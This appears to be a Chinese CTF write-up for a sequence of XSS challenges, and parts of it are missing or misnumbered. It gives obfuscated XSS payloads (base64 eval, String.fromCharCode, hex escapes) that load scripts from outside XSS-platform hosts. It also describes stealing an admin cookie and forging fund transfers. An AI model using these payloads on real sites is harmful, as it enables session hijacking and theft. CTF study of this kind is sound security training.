文章目录
- 前言
- web316
- web317-319
- 前面某些题梭哈
- web320
- web321
- web322-324过滤了;
- web325过滤了.
- 前面那个String.fromCharCode生产payload
- web327
- web328
- web329
- web320
- web331
- web322-323
- 参考链接
前言
以下需要师父们自己url解码哦,然后大部分使用了xss平台盲打连接最下方也有,过滤空格用/,师傅们注意这可能不是一篇WP,我之前忘记备份了呜呜,凑合着用一下,相关原理自己琢磨下
web316
web317-319
前面某些题梭哈
<input οnfοcus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veHNzOC5jYy8ySEpJIjtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw== autofocus>
web320
web321
web322-324过滤了;
<body/οnlοad=‘document.write(String.fromCharCode(60));document.write(String.fromCharCode(115));document.write(String.fromCharCode(67));document.write(String.fromCharCode(114));document.write(String.fromCharCode(73));document.write(String.fromCharCode(112));document.write(String.fromCharCode(116));document.write(String.fromCharCode(32));document.write(String.fromCharCode(115));document.write(String.fromCharCode(114));document.write(String.fromCharCode(67));document.write(String.fromCharCode(61));document.write(String.fromCharCode(47));document.write(String.fromCharCode(47));document.write(String.fromCharCode(120));document.write(String.fromCharCode(115));document.write(String.fromCharCode(46));document.write(String.fromCharCode(115));document.write(String.fromCharCode(98));document.write(String.fromCharCode(47));document.write(String.fromCharCode(89));document.write(String.fromCharCode(84));document.write(String.fromCharCode(85));document.write(String.fromCharCode(104));document.write(String.fromCharCode(62));document.write(String.fromCharCode(60));document.write(String.fromCharCode(47));document.write(String.fromCharCode(115));document.write(String.fromCharCode(67));document.write(String.fromCharCode(82));document.write(String.fromCharCode(105));document.write(String.fromCharCode(112));document.write(String.fromCharCode(84));document.write(String.fromCharCode(62));’>
web325过滤了.
<body/οnlοad=eval("\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x53\x74\x72\x69\x6e\x67\x2e\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65\x28\x36\x30\x2c\x31\x31\x35\x2c\x36\x37\x2c\x31\x31\x34\x2c\x37\x33\x2c\x31\x31\x32\x2c\x31\x31\x36\x2c\x33\x32\x2c\x31\x31\x35\x2c\x31\x31\x34\x2c\x36\x37\x2c\x36\x31\x2c\x34\x37\x2c\x34\x37\x2c\x31\x32\x30\x2c\x31\x31\x35\x2c\x34\x36\x2c\x31\x31\x35\x2c\x39\x38\x2c\x34\x37\x2c\x38\x39\x2c\x38\x34\x2c\x38\x35\x2c\x31\x30\x34\x2c\x36\x32\x2c\x36\x30\x2c\x34\x37\x2c\x31\x31\x35\x2c\x36\x37\x2c\x38\x32\x2c\x31\x30\x35\x2c\x31\x31\x32\x2c\x38\x34\x2c\x36\x32\x29\x29\x3b")>
web326过滤了括号
<body/οnlοad=eval("\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x53\x74\x72\x69\x6e\x67\x2e\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65\x28\x36\x30\x2c\x31\x31\x35\x2c\x36\x37\x2c\x31\x31\x34\x2c\x37\x33\x2c\x31\x31\x32\x2c\x31\x31\x36\x2c\x33\x32\x2c\x31\x31\x35\x2c\x31\x31\x34\x2c\x36\x37\x2c\x36\x31\x2c\x34\x37\x2c\x34\x37\x2c\x31\x32\x30\x2c\x31\x31\x35\x2c\x34\x36\x2c\x31\x31\x35\x2c\x39\x38\x2c\x34\x37\x2c\x38\x39\x2c\x38\x34\x2c\x38\x35\x2c\x31\x30\x34\x2c\x36\x32\x2c\x36\x30\x2c\x34\x37\x2c\x31\x31\x35\x2c\x36\x37\x2c\x38\x32\x2c\x31\x30\x35\x2c\x31\x31\x32\x2c\x38\x34\x2c\x36\x32\x29\x29\x3b")>
前面那个String.fromCharCode生产payload
web327
注意收件人是admin,无过滤
web328
自己搭建,主要是偷管理员的cookie
写一个js
下面是index.php
注册<script src=你的js地址></script>
之后把这个cookie替换掉浏览器里面本身的,访问用户管理页面就可以了
web329
从这道题以后,群主设置了把cookie发送给你之前就让它失效了,所以换一个思路获取页面元素
自己搭建
web320
web331
web322-323
一个是get请求,一个是post请求,payload类似web331,主要是向admin那里转账到自己注册的新号,然后去买flag就行了,当然你们可以发现题目其实有个小漏洞,自己向自己转钱钱也还会越来越多
好吧考虑到大家水平我把这道题发个payload,两道题分别是get和post,我们知道jquery的这个ajax不能携带cookie请求,所以有点麻烦,但是如果是本地请求就刚好绕过了这一点,我们先创建一个号<script src=我自己的js利用脚本内容是下面这个></script>
(记得映射公网),之后登陆退出后,再创建一个名为y4tacker
坐等收钱
参考链接
https://www.cnblogs.com/hookjoy/p/6181350.html xss平台:https://xsshs.cn/